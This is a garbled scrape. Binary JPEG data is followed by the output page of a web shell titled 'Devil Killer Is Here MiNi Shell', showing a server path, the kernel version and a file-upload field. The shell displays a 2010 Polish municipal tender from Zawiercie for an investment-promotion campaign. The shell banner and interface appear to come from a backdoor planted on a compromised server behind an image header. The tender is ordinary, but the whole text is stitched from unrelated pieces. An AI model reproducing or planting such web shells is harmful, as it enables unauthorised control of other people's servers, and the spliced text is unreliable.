JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100709/202542-N-2010.html

<p class="kh_header"><b>Zawiercie: Zaplanowanie i przeprowadzenie kampanii promującej ofertę inwestycyjną Zawiercia.
Tytuł projektu: Zawiercie - miasto dobrych połączeń</b><br>
<b>Numer ogłoszenia: 202542 - 2010; data zamieszczenia: 09.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaplanowanie i przeprowadzenie kampanii promującej ofertę inwestycyjną Zawiercia.
Tytuł projektu: Zawiercie - miasto dobrych połączeń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Zamówienie dotyczy zaplanowania i przeprowadzenia kampanii promującej ofertę inwestycyjną Zawiercia, zgodnie z wytycznymi zawartymi w dokumentach: Strategia Promocji Miasta Zawiercie oraz z Księga Identyfikacji Wizualnej, stanowiącymi załącznik do niniejszej specyfikacji.
II.	Za podstawową linie kreacji ma służyć hasło promocyjne: Zawiercie. Miasto dobrych połączeń.
III.	Kampania skierowana jest do następującej grupy docelowych - krajowi i zagraniczni: inwestorzy, krajowi i zagraniczni deweloperzy, architekci, doradcy, turyści biznesowi. 
IV.	Zamówienie obejmuje pięć zadań do realizacji. 
V.	Przekazy na wszystkich nośnikach kampanii promocyjnej muszą uwzględniać odpowiednie wymagania z zakresu informacji i promocji (w tym wizualizacji), tj. źródła finansowania. Ponadto powinny obowiązkowo zawierać znaki graficzne: logo Narodowej Strategii Spójności z odwołaniem słownym do Programu Regionalnego, logo województwa śląskiego, flaga UE z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego oraz zapis: Kampania finansowana przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.
VI.	Wytyczne do kreacji obowiązkowe do zastosowania we wszystkich zadaniach: 
Zawsze preferować: 
-	projekty z dominacją kolorów użytych w logo i strategii promocji miasta Zawiercia; 
-	zdjęcia stworzone w dni słoneczne (o ile inne ujęcie nie ma wyraźnego uzasadnienia artystycznego); 
-	pozytywne i łatwo dostrzegalne emocje, dynamika akcji;
-	aktywność ludzi. 
Należy unikać: 
-	obrazów źle oświetlonych, 
-	ujęć bez obecności ludzi.
VII.	Opis poszczególnych zadań wchodzących w zamówienie:

Zadanie I
Organizacja stoiska targowego miasta Zawiercia, w celu promocji oferty inwestycyjnej, na targach INVESTFIELD w Poznaniu w dniach 23-26 listopada 2010.
Zadanie realizowanie będzie przez następujące działania:

1.	Wykonanie stoiska targowego o wymiarach minimum 4m x 6m, wg koncepcji z załącznika, spójnego pod względem graficznym i merytorycznym z pozostałymi zadaniami. Stoisko z uwzględnieniem technologii mieszanej (zabudowa szkieletowa i/lub karton-gips) musi zawierać wyposażenie minimum:
- wykładzinę dywanową,
- minimum jeden element ściany wykonany w technologii karton-gips o wysokości ok. 5m, z zamontowanym telewizorem powyżej 46, przygotowanym do prezentacji multimedialnej, oraz z podświetlanym dużym logiem miasta,  
- ściany w zabudowie systemowej lub technologii karton-gips wraz z wbudowanym zapleczem o powierzchni nie większej jak 3m2, zawierającym: lodówkę, wieszak, kosz, gniazda elektryczne, regał. W ścianach zainstalowane 2 plafony podświetlane,
- stolik/ława, 4 krzesła/fotele, 2 hokery,
- wolnostojący stojak na foldery,
- ladę, 
- oświetlenie,
- zieleń i inne dekoracje,
- inne przewidziane elementy wystroju wynikające z projektu i wymogów Organizatora Targów.
2.	Zakup powierzchni wystawienniczej pod stoisko, uwzględniającej ustawienie makiety architektonicznej, o której mowa w pkt. 4.
3.	Wykonanie makiety architektonicznej wraz z podstawą, pokazującej zagospodarowanie terenów inwestycyjnych znajdujących się w Strefie Aktywności Gospodarczej Obszaru A (teren 2 i/lub 5) w Zawierciu, spójnej z zadaniem II pkt D. Wyrys ze studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Zawiercia, Rysunek planu oraz mapka SAG obszar A stanowią załączniki do niniejszej specyfikacji. 
4.	Zakup minimum 4 wejściówek dla przedstawicieli Gminy Zawiercie.
5.	Dokonanie wpisu do katalogu wystawców dotyczący Gminy Zawiercie, zgodnie z danymi przekazanymi przez Zamawiającego.
6.	Rozesłanie minimum 50 pisemnych zaproszeń do potencjalnych inwestorów wybranych przez Wykonawcę z obszaru technologii i gałęzi przemysłu wskazanych w Strategii Promocji Miasta Zawiercie, w celu odwiedzenia stoiska i zapoznania się z ofertą inwestycyjną Gminy Zawiercie.

Wytyczne dla tworzenia linii kreacyjnej dla zadania I.

1.	Cele zadania: 
- kształtowanie nowoczesnego wizerunku miasta Zawiercie jako miasta dobrych połączeń,
- powiększenie wiedzy na temat możliwości inwestycyjnych w mieście Zawiercie,
- pozyskanie potencjalnych inwestorów.
2.	Grupa docelowa - krajowi i zagraniczni: potencjalni inwestorzy, deweloperzy, firmy konsultingowe, architekci w obszarze technologii i gałęzi przemysłu wskazanych w Strategii Promocji Miasta Zawiercie.
3.	Projekt stoiska na potrzeby  kampanii powinien być zgodne z koncepcją kreatywną (big idea) Zawiercie. Miasto dobrych połączeń opisaną w Strategii Promocji Miasta Zawiercie na lata 2008-2009 oraz Księdze Identyfikacji Wizualnej.

Zadanie II 
Przygotowanie i wykonanie materiałów promocyjnych w formie prezentacji multimedialnej, filmu promocyjnego, spotów reklamowych i koncepcji przestrzennej zagospodarowania terenów inwestycyjnych.
Zadanie realizowane będzie przez następujące działania:

A. Prezentacja multimedialna

Zakres prac obejmuje:

1.	Opracowanie i wykonanie, spójnej pod względem graficznym i merytorycznym z pozostałymi zadaniami, oraz ze Strategią Promocji Miasta Zawiercie, interaktywnej prezentacji multimedialnej wykonanej w technologii flash. Interaktywna prezentacja flash powinna wykorzystywać możliwości multimedialnego przekazu, jaki oferuje najnowsza technologia, między innymi: filmy video, animacje 2D i 3D, galerie zdjęć, panoramy sferyczne, efekty dźwiękowe, głos lektora, dane liczbowe w formie dynamicznych wykresów i diagramów. Uruchomiona prezentacja CD powinna dawać możliwość bezpośredniego połączenia się z Internetem. 
2.	Prezentacja musi zawierać ogólne informacje o Zawierciu, ofertę inwestycyjną i gospodarczą miasta między innymi w kontekście położenia geograficznego i charakterystyki istniejących stref gospodarczych, lokalnej przedsiębiorczości itp., oraz część multimedialną zawierającą 3 minutowy film promocyjny o Zawierciu i 4 30-sekundowe spoty reklamowe o Zawierciu, które są opisane w pkt B i C. 
3.	Interaktywna prezentacja multimedialna przekazana zostanie Zamawiającemu w formacie umożliwiającym jej powielania na dowolnych nośnikach elektronicznych oraz umieszczenia jej na stronie internetowej www.zawiercie.eu 
4.	W zakres prezentacji wchodzi:
a)	Autostart z dynamicznym Intro (spotem reklamowym o Zawierciu) oraz z opcją wyboru wersji językowej (polska lub angielska).
b)	Animowany panel nawigacyjny.
c)	Interaktywne animowane menu główne z wyborem 3 bloków tematycznych: O Zawierciu, Oferta inwestycyjna, Multimedia.
d)	Blok O Zawierciu - zawiera informacje o lokalizacji Zawiercia z interaktywną mapą połączeń kolejowych, drogowych, lotniczych, pokazująca odległości, czas przejazdu, potencjał mieszkańców miasta, informacje demograficzne i statystyczne, prezentacje aktywności kulturalnej, informacje o atrakcjach turystycznych, ofercie wypoczynku, bazie sportowo rekreacyjnej. 
e)	Blok Oferta inwestycyjna - zawiera informacje na temat potencjału gospodarczego miasta oraz ofertę inwestycyjną z interaktywną mapką terenów inwestycyjnych z możliwością wyboru danej działki i przejścia do jej szczegółowego opisu. 
f)	Oferta inwestycyjna poszczególnych działek zawierająca każdorazowo:
- opis wraz z mapkami, z możliwością ściągnięcia w wersji PDF,
- wizualizację koncepcji przestrzennej zagospodarowania terenów inwestycyjnych,  będących przedmiotem zamówienia w zadaniu II pkt D.  
- Wizualizację koncepcji parku tematycznego JuraPark przekazanej przez Zamawiającego, 
- galerię zdjęć, 
- panoramy sferyczne. 
g)	Blok Multimedia zawierający: 
- 3 minutowy film promocyjny o Zawierciu będący przedmiotem zamówienia w zadaniu II pkt B,
- 30 sekundowe spoty reklamowe: Społeczeństwo, Biznes, Kultura, Wypoczynek, będący przedmiotem zamówienia w zadaniu II pkt C.  

B. Film promocyjny

Zakres prac obejmuje:

1.	Film promocyjny ma na celu prezentację, w sposób dynamiczny, nowoczesny, potencjału gospodarczego, turystycznego, społecznego i kulturalnego miasta Zawiercia.
2.	3 minutowy film promocyjny o mieście Zawierciu musi być zgodny z przedstawioną linią kreacyjną i scenariuszem (storyboardem) zatwierdzonym przez Zamawiającego.
3.	Produkcja zdjęć filmowych lub/i animacji zgodnie ze scenariuszem. Film musi być wyprodukowany w oparciu o sceny z udziałem aktorów/statystów. Dopuszcza się uzupełnienie filmu animacją. 
4.	Oprawa muzyczna zaakceptowana przez Zamawiającego.
5.	Wykonanie zaplanowanych zdjęć filmowych, animacji komputerowych, efektów specjalnych, wybór głosów lektorskich itp. zaakceptowanych przez Zamawiającego. 
6.	Postprodukcja - montaż i udźwiękowienie filmu promocyjnego.
7.	Organizacja kolaudacji w siedzibie Zamawiającego i przedstawienie wersji filmu promocyjnego.
8.	Dokonanie ewentualnych korekt i przedstawienie ostatecznej wersji filmu promocyjnego.
9.	Wykonanie i przekazanie Zamawiającemu kopii nośników wymaganych przez nadawców, w tym także na nośniku DVD umożliwiającej jego powielanie na dowolnych nośnikach elektronicznych oraz umieszczenie na stronie internetowej www.zawiercie.eu 

C. Spoty reklamowe

Zakres prac obejmuje:

1.	4 spoty reklamowe mają na celu prezentację, w sposób syntetyczny, dynamiczny i nowoczesny, potencjału: gospodarczego - pierwszy spot, turystycznego - drugi spot, społecznego - trzeci spot i kulturalnego - czwarty spot.
2.	30 sekundowe spoty muszą być zgodne z filmem promocyjnym, przedstawioną linią kreacyjną i scenariuszem (storyboardem) zatwierdzonym przez Zamawiającego.
3.	Produkcja zdjęć filmowych lub/i animacji zgodnie ze scenariuszem. Spoty muszą być wyprodukowane w oparciu o sceny z udziałem aktorów/statystów. Dopuszcza się uzupełnienie spotu animacją. 
4.	Oprawa muzyczna zaakceptowana przez Zamawiającego.
5.	Wykonanie zaplanowanych zdjęć filmowych, animacji komputerowych, efektów specjalnych, wybór aktorów i głosów lektorskich itp. zaakceptowanych przez Zamawiającego. 
6.	Postprodukcja - montaż i udźwiękowienie spotów reklamowych.
7.	Organizacja kolaudacji w siedzibie Zamawiającego i przedstawienie wersji spotów reklamowych.
8.	Dokonanie ewentualnych korekt i przedstawienie ostatecznej wersji 4 spotów reklamowych (Gospodarka, Turystyka, Społeczeństwo, Kultura).
9.	Wykonanie i przekazanie Zamawiającemu materiałów w formatach, umożliwiających ich powielanie na dowolnych nośnikach elektronicznych oraz umieszczenie na stronie internetowej www.zawiercie.eu 

D. Koncepcja przestrzenna zagospodarowania terenów inwestycyjnych
Zakres prac obejmuje:

1.	Wykonanie przez Wykonawcę, koncepcji przestrzennej zagospodarowania terenów inwestycyjnych znajdujących się w Strefie Aktywności Gospodarczej Obszar A obejmującej: budynki, hale produkcyjne, drogi, małą architekturę, zgodnie z planem zagospodarowania przestrzennego dla tego terenu stanowiącym załącznik do  specyfikacji. 
2.	Koncepcja wykonana będzie w formie 3D z możliwością prezentowania poszczególnych fragmentów obszaru oraz poszczególnych budynków.
3.	Koncepcja stanowić będzie element prezentacji multimedialne 3D, o której mowa w zadaniu II A, wykorzystana zostanie również do wykonania makiety architektonicznej, o której mowa w zadaniu I pkt. 4 oraz materiałów poligraficznych, o których mowa w zadaniu II E.
4.	Koncepcja przekazana zostanie Zamawiającemu w wersji elektronicznej w formatach JPG oraz PDF w rozdzielczości umożliwiającej wydruki do formatu A1.
5.	Wyrys ze studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Zawiercia, Rysunek planu oraz mapka SAG obszar A stanowią załączniki do  specyfikacji.

E. Materiały poligraficzne

Zakres prac obejmuje:

1.	Opracowanie (projekt graficzny) i wykonanie przez Wykonawcę: 
a)	Płyty CD/DVD z prezentacją multimedialną zawierającą autostart 
- nakład: 1000 sztuk
- nadruk na cd: pełny kolor
- inne: nadruk na cd z grafiką spójną z pozostałymi zadaniami 
b)	Okładkę na płytę - rozkładana, z kieszenią na płytę CD i wkładkę
- format: 12,5cm x 12,5cm
- nakład: 1000 sztuk  
- rodzaj i gramatura papieru: karton 240g/m2,
- kolorystyka:  4+0 
- uszlachetnianie: folia matowa+UV
- inne: okładka w grafice spójnej z pozostałymi zadaniami, okładka lakierowana punktowo.
c)	Wkładkę do okładki na płytę zawierająca krótki opis oferty inwestycyjnej Zawiercia 
- format: składana do formatu 12cm x 12cm
- nakład: 1000 sztuk  
- rodzaj i gramatura papieru: papier 80 g/m2
- kolorystyka:  4+4 
- inne: tekst w języku angielskim, ulotka w grafice spójnej z pozostałymi zadaniami.
d)	Ulotkę o mieście stanowiąca uzupełnienie do prezentacji multimedialnej 
- format: 44cm x 21cm, składana na 4 do formatu 11cm x 21cm
- nakład: 1000 sztuk  
- rodzaj i gramatura papieru: papier kredowy matowy 170 g/m2
- kolorystyka:  (4+4) pełny kolor 
- inne: ulotka wykonana w języku polskim 

Wytyczne dla tworzenia linii kreacyjnej dla zadania II.

1.	Cele zadania II: 
- kształtowanie nowoczesnego wizerunku miasta Zawiercie jako miasta dobrych połączeń,
- powiększenie wiedzy na temat możliwości inwestycyjnych w mieście Zawiercie,
- powiększenie wiedzy na temat możliwości aktywnego wypoczynku w mieście i jego najbliższych okolicach,
- prezentacja potencjału gospodarczego miasta,
- pozyskanie potencjalnych inwestorów.
2.	Grupa docelowa - krajowi i zagraniczni: potencjalni inwestorzy, deweloperzy, firmy konsultingowe, architekci, biznesmeni oraz mieszkańcy miasta.
3.	Cel komunikacyjny: Zawiercie to miasto o atrakcyjnym potencjale gospodarczym, posiadające interesujące tereny inwestycyjne. Zawiercie to również miasto atrakcyjne turystycznie, oferujące wiele różnych form aktywnego wypoczynku dla wszystkich. Połączenie potencjału gospodarczego z możliwością aktywnego wypoczynku oraz dogodna lokalizacją sprawia, że Zawiercie jest miastem dobrych połączeń, gdzie w sposób płynny łączą się cztery główne obszary życia: gospodarczy, społeczny, kulturalny i wypoczynkowy (turystyczny).
4.	Koncepcja przewodnia w zadaniu II (big idea): Zawiercie. Miasto dobrych połączeń opisana w Strategii Promocji Miasta Zawiercie na lata 2008-2009.
5.	Należy zapewnić spójność strategiczno-merytoryczną, werbalną, audio i wizualną wszystkich narzędzi oraz środków wyrazu (zgodność z opracowaną linią kreacyjną całego przedmiotu zamówienia). 

Zadanie III
Przygotowanie i wykonanie materiałów promocyjnych w formie niezbędnika inwestora.

Zadanie realizowanie będzie przez następujące działania:

1. Wykonanie teczki ofertowej 
- format: A4
- nakład: 2000 sztuk
- gramatura papieru: 285 g/m2		
- kolorystyka:  4+4
- uszlachetnianie: folia matowa+UV
- inne: okładka punktowo lakierowana, teczka musi posiadać kieszeń na materiały promocyjne i nacięcie na wizytówkę. 

2. Wykonanie folderu inwestycyjnego zawierającego prezentację potencjału gospodarczego miasta (teksty, tabele, zdjęcia, wykresy)
- format: A4
- nakład: 2000 sztuk (1000 szt. wersja angielska, 1000 szt. wersja niemiecka)
- gramatura papieru: okładka 250 g/m2,  środek 170 g/m2 
- kolorystyka:  okładka 4+4 , środek 4+4
- uszlachetnianie: folia matowa+UV 
- objętość: 20 stron z okładką
- inne: zszywany, okładka punktowo lakierowana

Zawartość merytoryczna folderu:
- Lokalizacja miasta,
- Mocne strony miasta, misja, wizja,
- Gospodarka - prezentacja dotychczasowych inwestorów w mieście,
- Ludność - aktywność po pracy,
- Koncepcje 3D zagospodarowania terenów inwestycyjnych analogiczne jak w prezentacją multimedialną,
- Dane teleadresowe.

3. Wkładki do folderu dla poszczególnych terenów inwestycyjnych zawierające: mapkę, koncepcję 3D zagospodarowania terenu spójną z prezentacją multimedialną, opis działki.
- format: A4
- nakład: 2000 sztuk  (1000 szt. wersja angielska, 1000 szt. wersja niemiecka)
- rodzaj i gramatura papieru: papier kredowy matowy 170 g/m2
- kolorystyka:  4+4 

Zawartość merytoryczna materiałów zadania 3 pkt 1-3 zostanie przekazana przez Zamawiającego w formie elektronicznej w języku polskim, w formacie doc.

4. Gadżety promocyjne:
a)	bawełniane torby ekologiczne z nadrukiem loga Zawiercia w ilości minimum 500 szt. Rozmiar nie mniejszy jak 38cm x 42cm, gramatura nie mniejsza jak 120gr, standardowy uchwyt wszywany 40cm.
b)	koszulki bawełniane w kolorze granatowym, typu polo z haftowanym logo Zawiercia w ilości minimum 500 szt. (rozmiary S 1/3 ilości, M 1/3 ilości, L 1/3 ilości). Gramatura koszulek minimum 200gr, 100% bawełna, taśma wzmacniająca na karku, boczne szwy, podwójne szwy u dołu koszulki, boczne rozcięcia.
c)	etui na wizytówki i płyty CD z tłoczonym logo Zawiercia w ilości minimum 150 szt. 
d)	parasole automatyczne, kolor granatowy, z drewnianą rączką, średnica minimum 97cm. z logo Zawiercie w ilości minimum 150 szt.
e)	pendrive USB pojemność min. 1 GB z logo Zawiercia, umożliwiający nagranie prezentacji multimedialnej Zawiercia w ilości minimum 500 szt.
f)	kryształowe amonity z logo Zawiercia w ilości minimum 200 szt.

Wytyczne dla tworzenia linii kreacyjnej dla zadania III.

1.	Cele zadania III: 
- kształtowanie nowoczesnego wizerunku miasta Zawiercie jako miasta dobrych połączeń,
- powiększenie wiedzy na temat możliwości inwestycyjnych w mieście Zawiercie,
- powiększenie wiedzy na temat możliwości aktywnego wypoczynku w mieście i jego najbliższych okolicach,
- prezentacja potencjału gospodarczego miasta
- pozyskanie potencjalnych inwestorów
2.	Grupa docelowa - krajowi i zagraniczni: potencjalni inwestorzy, deweloperzy, firmy konsultingowe, architekci, biznesmeni oraz mieszkańcy miasta.
3.	Cel komunikacyjny: Zawiercie to miasto o atrakcyjnym potencjale gospodarczym, posiadające interesujące tereny inwestycyjne. Zawiercie to również miasto atrakcyjne turystycznie, oferujące wiele różnych form aktywnego wypoczynku dla wszystkich. Połączenie potencjału gospodarczego z możliwością aktywnego wypoczynku oraz dogodna lokalizacją sprawia, że Zawiercie jest miastem dobrych połączeń, gdzie w sposób płynny łączą się cztery główne obszary życia: gospodarczy, społeczny, kulturalny i wypoczynkowy (turystyczny).
4.	Koncepcja przewodnia w zadaniu III (big idea): Zawiercie. Miasto dobrych połączeń opisana w Strategii Promocji Miasta Zawiercie na lata 2008-2009.
5.	Należy zapewnić spójność strategiczno-merytoryczną, werbalną, audio i wizualną wszystkich narzędzi oraz środków wyrazu (zgodność z opracowaną linią kreacyjną całego przedmiotu zamówienia). 

Zadanie IV
Przygotowanie i wykonanie materiałów promocyjnych w formie albumu o mieście Zawiercie.

Zadanie realizowanie będzie przez następujące działania:

1.	Wykonanie albumu promocyjnego o Zawierciu w 2 wersjach językowych: polska i angielska.
2.	Zawartość albumu podzielona, zgodnie ze strategią promocji, na 5 rozdziałów: Historia, Społeczeństwo, Biznes, Kultura, Wypoczynek. 
3.	Każdy z rozdziałów zawiera minimum 15 zdjęć w formacie: minimum A5,  zdjęcia wykonane lub zakupione przez Wykonawcę, zgodnie z wytycznymi do kreacji. Album zawiera  krótkie opisy dotyczące poszczególnych obszarów życia miasta.
4.	Specyfikacja albumu:

- format: A4
- nakład: 1000 sztuk
- objętość: minimum 60 stron
- gramatura papieru: okładka twarda albumowa plus uszlachetnienie, środek papier 150g/m2
- kolorystyka:  okładka 4+1 , środek 4+4 
- introligatornia: album szyty i klejony

Wytyczne dla tworzenia linii kreacyjnej dla zadania IV.

1.	Cele zadania IV: 
- kształtowanie nowoczesnego wizerunku miasta Zawiercie jako miasta dobrych połączeń,
- powiększenie wiedzy na temat możliwości inwestycyjnych w mieście Zawiercie,
- powiększenie wiedzy na temat możliwości aktywnego wypoczynku w mieście i jego najbliższych okolicach,
2.	Grupa docelowa - krajowi i zagraniczni: potencjalni inwestorzy, deweloperzy, firmy konsultingowe, architekci, biznesmeni oraz mieszkańcy miasta.
3.	Cel komunikacyjny: Połączenie potencjału gospodarczego, kulturalnego, społecznego i turystycznego z dogodną lokalizacją i komunikacją sprawia, że Zawiercie jest miastem dobrych połączeń, gdzie w sposób płynny łączą się cztery główne obszary życia: gospodarczy, społeczny, kulturalny i wypoczynkowy (turystyczny).
4.	Koncepcja przewodnia w zadaniu IV (big idea): Zawiercie. Miasto dobrych połączeń opisana w Strategii Promocji Miasta Zawiercie na lata 2008-2009.
5.	Należy zapewnić spójność strategiczno-merytoryczną, werbalną, audio i wizualną wszystkich narzędzi oraz środków wyrazu (zgodność z opracowaną linią kreacyjną całego przedmiotu zamówienia). 

Zadanie V
Kampania plakatowa promująca ofertę inwestycyjna Miasta. 

Zadanie realizowanie będzie przez następujące działania:

1.	Wykonanie projektu graficznego plakatu.
2.	Plakaty reklamowe muszą być zgodne z przedstawioną linią kreacyjną.
3.	Wykonanie bądź zakup zdjęć potrzebnych do przygotowania projektu plakatu reklamowego.
4.	Plakaty reklamowe muszą być wykonane dla ekspozycji w następujących formatach:
-	reklam na tablicach o pow. reklamowej 12 m2 (format 5,04 m x 2,38 m). 
5.	Wydrukowanie plakatów lub przekazanie projektów operatorowi tablic wielkoformatowych, w formatach wymaganych przez drukarnie i nadzór nad drukiem. 
6.	Zakup powierzchni reklamowych w ilości 420 m2 co stanowi 35 tablic na okres 14 dni
7.	Specyfikacja lokalizacji tablic reklamowych:
- droga E75 na odcinku Warszawa - Katowice - 14 tablic
- droga E75 na odcinku Zawiercie - Bielsko-Biała - Cieszyn - 8 tablic
- droga 78 na odcinku Mierzęcice - Kielce - 11 tablice
- drogi 78 i 913 na odcinku Mierzęcice - Lotnisko - 2 tablice

Wytyczne dla tworzenia linii kreacyjnej dla zadnia V.

1.	Cele zadania V: 
- kształtowanie nowoczesnego wizerunku miasta Zawiercie jako miasta dobrych połączeń,
- powiększenie wiedzy na temat możliwości inwestycyjnych w mieście Zawiercie,
2.	Grupa docelowa - krajowi i zagraniczni: potencjalni inwestorzy, deweloperzy, firmy konsultingowe, architekci, biznesmeni oraz mieszkańcy Zawiercia.
3.	Cel komunikacyjny: Połączenie potencjału gospodarczego, z dogodną lokalizacją i komunikacją sprawia, że Zawiercie jest miastem dobrych połączeń, gdzie warto inwestować i warto żyć.
4.	Koncepcja przewodnia w zadaniu V (big idea): Zawiercie. Miasto dobrych połączeń opisana w Strategii Promocji Miasta Zawiercie na lata 2008-2009.
5.	Należy zapewnić spójność strategiczno-merytoryczną, werbalną, audio i wizualną wszystkich narzędzi oraz środków wyrazu (zgodność z opracowaną linią kreacyjną całego przedmiotu zamówienia)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0, 79.34.22.00-5, 79.95.00.00-8, 39.29.41.00-0, 92.11.12.10-7, 22.46.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
